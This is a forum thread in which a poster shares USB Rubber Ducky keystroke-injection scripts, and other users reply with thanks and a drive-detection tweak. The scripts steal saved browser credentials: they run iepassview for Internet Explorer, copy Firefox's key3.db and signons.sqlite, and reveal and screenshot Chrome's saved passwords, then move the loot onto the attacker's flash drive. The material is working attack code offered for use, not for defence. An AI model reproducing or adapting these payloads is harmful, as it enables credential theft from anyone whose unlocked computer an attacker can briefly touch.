mrt0mat0 Posted January 20, 2013 Share Posted January 20, 2013 (edited) So, I didn't see any examples of this, so I tried my best to get some basic ones down. Now, I only tested this on two systems and they seem to work. the timing for some might need to be tweaked. The biggest issue is that each browser uses different methods, so I made one for each... files on flash drive: iepv.exe, evac.txt Internet Explorer 9 This is actually the biggest cheat, as I just used iepassview but it's very portable so with my twin duck, i just threw it on there and it worked like a dream, except it takes like 10 seconds to run... DEFAULTDELAY 50 DELAY 4000 GUI m DELAY 200 CTRL ESC STRING cmd ENTER DELAY 200 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) ENTER DELAY 200 STRING iepv.exe ENTER DELAY 10000 CTRL s DELAY 200 STRING ie_passes.txt ENTER DELAY 1000 ALT F4 DELAY 200 STRING exit ENTER Firefox this copies two files over key3 and signon. once you have them you can just drop them in a profile and go to the passwords section in firefox DEFAULTDELAY 50 DELAY 3000 GUI m DELAY 200 CTRL ESC STRING cmd ENTER DELAY 200 STRING cd %userprofile% ENTER DELAY 200 STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\ TAB STRING \key3.db key3.db ENTER DELAY 200 STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\ TAB STRING \signons.sqlite signons.sqlite ENTER DELAY 200 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: exit: ) ENTER STRING move %userprofile%\key3.db key3.db ENTER DELAY 200 STRING move %userprofile%\signons.sqlite signons.sqlite ENTER STRING exit ENTER Chrome 24 I went to the passwords page, switched all the passwords on manually and screen capped it. The biggest flaw with this one is the password amount. this sample runs 8 passwords. if there are less you have a chance of randomly changing something. if there are more, you don't get all the ones available, which isn't always that big of a deal. this was only tested in chrome 24.0 so it may be different depending on the version. DEFAULTDELAY 50 DELAY 3000 GUI m DELAY 200 CTRL ESC STRING chrome ENTER DELAY 1000 ESCAPE DELAY 500 ALT SPACE STRING x DELAY 200 CTRL l STRING chrome://settings/passwords ENTER DELAY 200 TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB ALT PRINTSCREEN ALT F4 DELAY 400 GUI r STRING mspaint ENTER DELAY 1000 CTRL v DELAY 300 CTRL s DELAY 300 STRING %userprofile%\chrome.png ENTER DELAY 300 ALT f STRING x DELAY 300 CTRL ESC STRING cmd ENTER DELAY 300 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) ENTER DELAY 300 STRING move %userprofile%\chrome.png chrome.png ENTER DELAY 300 STRING exit ENTER look forward to feedback and improvements Edited January 20, 2013 by smacks Quote Link to comment Share on other sites More sharing options...
Bucky67GTO Posted January 21, 2013 Share Posted January 21, 2013 Love it so far. cant wait to put through its paces. Thought about grabbing some of this through the registry, but this seems more straightforward. Quote Link to comment Share on other sites More sharing options...
mrt0mat0 Posted January 21, 2013 Author Share Posted January 21, 2013 Love it so far. cant wait to put through its paces. Thought about grabbing some of this through the registry, but this seems more straightforward. i know ie keeps the files in registry, but they're encrypted. i was going to look up the commands to decrypt to make it a pure "HID" attack, but I got distracted with other things. also, chrome has files you can pull but i'm not 100% on which ones and how i'd decrypt those as well. I know it's possible though Quote Link to comment Share on other sites More sharing options...
overwraith Posted January 21, 2013 Share Posted January 21, 2013 Midnight snake showed me an improvement to the command line drive finding code; J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d J:\>echo %myd% J: This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore. Quote Link to comment Share on other sites More sharing options...
no42 Posted January 21, 2013 Share Posted January 21, 2013 Midnight snake showed me an improvement to the command line drive finding code; J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d J:\>echo %myd% J: This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore. Just remember to label the sdcard to "DUCKY" for this to work..... their not labelled by default (if they are its usually some pseudo-random code eg "23AF-3DDE") Quote Link to comment Share on other sites More sharing options...
overwraith Posted January 22, 2013 Share Posted January 22, 2013 Just remember to label the sdcard to "DUCKY" for this to work..... their not labelled by default (if they are its usually some pseudo-random code eg "23AF-3DDE") But it is much better than looking for a file that does nothing on the root of the drive. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.